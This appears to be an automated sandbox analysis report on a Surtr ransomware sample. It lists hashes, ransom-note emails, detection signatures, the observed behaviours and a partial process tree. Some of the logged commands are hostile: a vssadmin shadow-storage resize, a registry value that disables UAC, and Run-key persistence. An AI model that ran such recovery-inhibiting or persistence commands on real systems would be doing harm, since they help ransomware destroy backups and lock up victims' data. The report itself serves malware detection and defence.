Analysis
-
max time kernel
121s -
max time network
152s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
24-12-2021 07:08
Static task
static1
Behavioral task
behavioral1
Sample
surtr.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
surtr.exe
Resource
win10-en-20211208
General
-
Target
surtr.exe
-
Size
320KB
-
MD5
e6fc190168519d6a6c4f1519e9450f0f
-
SHA1
af2080ddf1064fb80c7b9af942aaabf264441098
-
SHA256
8199ef63e0058be6217ec8392258fbe7fac9fb556b8e87f40a3a45835f424980
-
SHA512
4522d4e3f8a38dbceb30d09ea04ceeacc33bb273d702d706be68405cd4c9492f862f4ae741f4e0140b54203b3db521e96663f9757bb241b1ac63c1eda3ebb6ba
Malware Config
Extracted
C:\ProgramData\Service\SURTR_README.txt
DecryptMyData@mailfence.com
Decrypter@msgsafe.io
Extracted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
surtr
DecryptMyData@mailfence.com
Decrypter@msgsafe.io
Signatures
-
Detects Surtr Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3680-116-0x0000000140133F50-mapping.dmp family_surtr behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp family_surtr -
Surtr
Ransomware family first seen in late 2021.
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Clears Windows event logs 1 TTPs 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exepid process 4988 wevtutil.exe 2084 4236 wevtutil.exe 4920 wevtutil.exe 264 1224 wevtutil.exe 4184 wevtutil.exe 4916 wevtutil.exe 1252 1216 4556 5032 4360 wevtutil.exe 4984 wevtutil.exe 1964 276 3520 3324 4548 2332 4416 4904 3724 280 wevtutil.exe 4512 wevtutil.exe 1016 4488 wevtutil.exe 5052 4812 5024 4176 2116 5000 wevtutil.exe 3920 592 3864 wevtutil.exe 904 wevtutil.exe 3720 wevtutil.exe 4976 4536 5116 4932 4564 2300 4316 3772 wevtutil.exe 4012 3440 wevtutil.exe 4144 636 4416 1480 5020 wevtutil.exe 1068 wevtutil.exe 4428 wevtutil.exe 3380 932 592 wevtutil.exe 4904 wevtutil.exe 4872 wevtutil.exe 5108 3124 816 4004 -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 4776 bcdedit.exe 1036 bcdedit.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Processes:
resource yara_rule behavioral2/memory/3680-115-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral2/memory/3680-117-0x0000000140000000-0x0000000140136000-memory.dmp upx behavioral2/memory/3680-118-0x0000000140000000-0x0000000140136000-memory.dmp upx -
Drops startup file 6 IoCs
Processes:
cmd.exenet1.exenet.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt net1.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt net1.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe net.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe net.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
cmd.exereg.exereg.execmd.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" cmd.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce cmd.exe Set value (str) \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" cmd.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run cmd.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exevssadmin.exesurtr.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\A: vssadmin.exe File opened (read-only) \??\E: surtr.exe File opened (read-only) \??\L: surtr.exe File opened (read-only) \??\P: surtr.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\G: surtr.exe File opened (read-only) \??\B: surtr.exe File opened (read-only) \??\Z: vssadmin.exe File opened (read-only) \??\T: vssadmin.exe File opened (read-only) \??\V: vssadmin.exe File opened (read-only) \??\N: vssadmin.exe File opened (read-only) \??\B: vssadmin.exe File opened (read-only) \??\K: surtr.exe File opened (read-only) \??\I: vssadmin.exe File opened (read-only) \??\R: vssadmin.exe File opened (read-only) \??\F: surtr.exe File opened (read-only) \??\I: surtr.exe File opened (read-only) \??\O: surtr.exe File opened (read-only) \??\Q: surtr.exe File opened (read-only) \??\R: surtr.exe File opened (read-only) \??\T: surtr.exe File opened (read-only) \??\Y: vssadmin.exe File opened (read-only) \??\W: vssadmin.exe File opened (read-only) \??\P: vssadmin.exe File opened (read-only) \??\H: surtr.exe File opened (read-only) \??\W: surtr.exe File opened (read-only) \??\S: vssadmin.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\Q: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\U: vssadmin.exe File opened (read-only) \??\J: surtr.exe File opened (read-only) \??\N: surtr.exe File opened (read-only) \??\V: surtr.exe File opened (read-only) \??\Z: surtr.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\D: vssadmin.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\X: vssadmin.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\M: surtr.exe File opened (read-only) \??\S: surtr.exe File opened (read-only) \??\U: surtr.exe File opened (read-only) \??\X: surtr.exe File opened (read-only) \??\Y: surtr.exe File opened (read-only) \??\A: surtr.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
surtr.exedescription pid process target process PID 2668 set thread context of 3680 2668 surtr.exe surtr.exe -
Drops file in Program Files directory 64 IoCs
Processes:
surtr.exedescription ioc process File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\images\share_icons2x.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_SubTrial2-ul-oob.xrm-ms.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\Microsoft Power Query for Excel Integrated\bin\Microsoft.Mashup.Client.Excel.EditorRibbon.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.swt.nl_ja_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-modules-profiler_visualvm.jar.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\BCSRuntimeRes.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\de\System.Xml.Linq.Resources.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ECHO\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt.[DecryptMyData@mailfence.com].SURT surtr.exe File created C:\Program Files\Java\jre1.8.0_66\SURTR_README.hta surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PublisherR_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\ADDINS\PowerPivot Excel Add-in\Microsoft.Data.Recommendation.Common.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\gtkHandle.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\GFX.DLL.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\RMNSQUE\RMNSQUE.ELM.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\css\main-cef-win8.css.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Client\api-ms-win-crt-utility-l1-1-0.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_Subscription4-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\Library\Analysis\PROCDB.XLAM.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\fr-ma\ui-strings.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\screenshots@mozilla.org.xpi.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\assets\Sample Files\Complex Machine.pdf.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.databinding.observable.nl_ja_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.INF.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Combine_R_RHP.aapp.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\pdf-ownership-variant2.gif.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\tr-tr\ui-strings.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\tool\plugin.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Garamond.xml.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioPro2019R_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordR_Trial-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\OFFICE16\1033\MSSOAPR3.DLL.[DecryptMyData@mailfence.com].SURT surtr.exe File created C:\Program Files (x86)\Windows NT\Private_DATA.surt surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\js\nls\es-es\ui-strings.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\js\nls\hr-hr\ui-strings.js.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_bn.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Common Files\microsoft shared\Stationery\ShadesOfBlue.jpg.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\SkypeSrv\SFBAPPSDK.DLL.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\TRANSLAT\ESEN\WT61ES.LEX.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_gridview_selected-hover.svg.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_sv.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Grace-ppd.xrm-ms.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ky\LC_MESSAGES\vlc.mo.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_checkbox_partialselected-default_18.svg.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ro_get.svg.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.commands.nl_zh_4.4.0.v20140623020002.jar.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Calibri Light-Constantia.xml.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpResL.dll.mui.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\win7Handle.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-white_scale-100.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\logger\libconsole_logger_plugin.dll.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\walk-through\images\themes\dark\checkmark-2x.png.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\7-Zip\Lang\sq.txt.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessR_Retail-ul-phn.xrm-ms.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\wordvisi.ttf.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\ARCTIC\THMBNAIL.PNG.[DecryptMyData@mailfence.com].SURT surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\Portal\PortalConnectCore.dll.[DecryptMyData@mailfence.com].SURT surtr.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1304 schtasks.exe 4872 schtasks.exe 2472 -
Interacts with shadow copies 2 TTPs 26 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 508 vssadmin.exe 4032 vssadmin.exe 2292 vssadmin.exe 3796 vssadmin.exe 3700 vssadmin.exe 4288 vssadmin.exe 3324 vssadmin.exe 1360 vssadmin.exe 1796 vssadmin.exe 4132 vssadmin.exe 4200 vssadmin.exe 2224 vssadmin.exe 4308 vssadmin.exe 2156 vssadmin.exe 1184 vssadmin.exe 1188 vssadmin.exe 4080 vssadmin.exe 4192 vssadmin.exe 2928 vssadmin.exe 3788 vssadmin.exe 3916 vssadmin.exe 3772 vssadmin.exe 1340 vssadmin.exe 4040 vssadmin.exe 4152 vssadmin.exe 4256 vssadmin.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
pid process 984 -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
surtr.exepid process 3680 surtr.exe 3680 surtr.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
vssvc.exenet1.execmd.exewevtutil.exewevtutil.execmd.exenet.exenet.exenet1.exenet.exenet.exenet1.exenet.exewevtutil.exewevtutil.exenet.exewevtutil.exenet.exenet1.exewevtutil.execmd.exewevtutil.exenet1.exenet1.exewevtutil.exewevtutil.exewevtutil.exenet.execmd.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeBackupPrivilege 2008 vssvc.exe Token: SeRestorePrivilege 2008 vssvc.exe Token: SeAuditPrivilege 2008 vssvc.exe Token: SeSecurityPrivilege 3320 net1.exe Token: SeBackupPrivilege 3320 net1.exe Token: SeSecurityPrivilege 4528 cmd.exe Token: SeBackupPrivilege 4528 cmd.exe Token: SeSecurityPrivilege 2616 wevtutil.exe Token: SeBackupPrivilege 2616 wevtutil.exe Token: SeSecurityPrivilege 3048 wevtutil.exe Token: SeBackupPrivilege 3048 wevtutil.exe Token: SeSecurityPrivilege 4628 cmd.exe Token: SeBackupPrivilege 4628 cmd.exe Token: SeSecurityPrivilege 4608 net.exe Token: SeBackupPrivilege 4608 net.exe Token: SeSecurityPrivilege 4548 net.exe Token: SeBackupPrivilege 4548 net.exe Token: SeSecurityPrivilege 3860 net1.exe Token: SeBackupPrivilege 3860 net1.exe Token: SeSecurityPrivilege 1780 net.exe Token: SeBackupPrivilege 1780 net.exe Token: SeSecurityPrivilege 4180 net.exe Token: SeBackupPrivilege 4180 net.exe Token: SeSecurityPrivilege 5056 net1.exe Token: SeBackupPrivilege 5056 net1.exe Token: SeSecurityPrivilege 2320 net.exe Token: SeBackupPrivilege 2320 net.exe Token: SeSecurityPrivilege 5092 wevtutil.exe Token: SeBackupPrivilege 5092 wevtutil.exe Token: SeSecurityPrivilege 1608 wevtutil.exe Token: SeBackupPrivilege 1608 wevtutil.exe Token: SeSecurityPrivilege 1380 net.exe Token: SeBackupPrivilege 1380 net.exe Token: SeSecurityPrivilege 4812 wevtutil.exe Token: SeBackupPrivilege 4812 wevtutil.exe Token: SeSecurityPrivilege 4892 net.exe Token: SeBackupPrivilege 4892 net.exe Token: SeSecurityPrivilege 3240 net1.exe Token: SeBackupPrivilege 3240 net1.exe Token: SeSecurityPrivilege 284 wevtutil.exe Token: SeBackupPrivilege 284 wevtutil.exe Token: SeSecurityPrivilege 1488 cmd.exe Token: SeBackupPrivilege 1488 cmd.exe Token: SeSecurityPrivilege 4868 wevtutil.exe Token: SeBackupPrivilege 4868 wevtutil.exe Token: SeSecurityPrivilege 3088 net1.exe Token: SeBackupPrivilege 3088 net1.exe Token: SeSecurityPrivilege 3984 net1.exe Token: SeBackupPrivilege 3984 net1.exe Token: SeSecurityPrivilege 4080 wevtutil.exe Token: SeBackupPrivilege 4080 wevtutil.exe Token: SeSecurityPrivilege 4996 wevtutil.exe Token: SeBackupPrivilege 4996 wevtutil.exe Token: SeSecurityPrivilege 4336 wevtutil.exe Token: SeBackupPrivilege 4336 wevtutil.exe Token: SeSecurityPrivilege 4352 net.exe Token: SeBackupPrivilege 4352 net.exe Token: SeSecurityPrivilege 4112 cmd.exe Token: SeBackupPrivilege 4112 cmd.exe Token: SeSecurityPrivilege 3040 wevtutil.exe Token: SeBackupPrivilege 3040 wevtutil.exe Token: SeSecurityPrivilege 4236 wevtutil.exe Token: SeBackupPrivilege 4236 wevtutil.exe Token: SeSecurityPrivilege 4476 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
surtr.exesurtr.execmd.exedescription pid process target process PID 2668 wrote to memory of 3680 2668 surtr.exe surtr.exe PID 2668 wrote to memory of 3680 2668 surtr.exe surtr.exe PID 2668 wrote to memory of 3680 2668 surtr.exe surtr.exe PID 2668 wrote to memory of 3680 2668 surtr.exe surtr.exe PID 2668 wrote to memory of 3680 2668 surtr.exe surtr.exe PID 2668 wrote to memory of 3680 2668 surtr.exe surtr.exe PID 2668 wrote to memory of 3680 2668 surtr.exe surtr.exe PID 3680 wrote to memory of 2332 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2332 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 4032 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 4032 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2260 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2260 3680 surtr.exe cmd.exe PID 2260 wrote to memory of 1184 2260 cmd.exe chcp.com PID 2260 wrote to memory of 1184 2260 cmd.exe chcp.com PID 3680 wrote to memory of 772 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 772 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1520 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1520 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1732 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1732 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3060 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3060 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3744 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3744 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3984 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3984 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3520 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3520 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3920 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3920 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3344 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3344 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3640 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 3640 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2772 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2772 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1472 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1472 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2784 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2784 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2600 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2600 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1336 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1336 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1320 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1320 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1616 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1616 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 664 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 664 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 592 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 592 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1176 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1176 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1264 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1264 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2568 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2568 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2392 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2392 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2552 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 2552 3680 surtr.exe cmd.exe PID 3680 wrote to memory of 1252 3680 surtr.exe cmd.exe -
Views/modifies file attributes 1 TTPs 8 IoCs
Processes:
attrib.exeattrib.exepid process 4176 940 5092 2136 1804 4848 4812 attrib.exe 264 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\surtr.exe"C:\Users\Admin\AppData\Local\Temp\surtr.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\surtr.exe"C:\Users\Admin\AppData\Local\Temp\surtr.exe"2⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo off3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4373⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\chcp.comchcp 4374⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB3⤵
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c vssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB4⤵
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=D:\ /on=D:\ /maxsize=401MB5⤵
- Enumerates connected drives
- Interacts with shadow copies
-
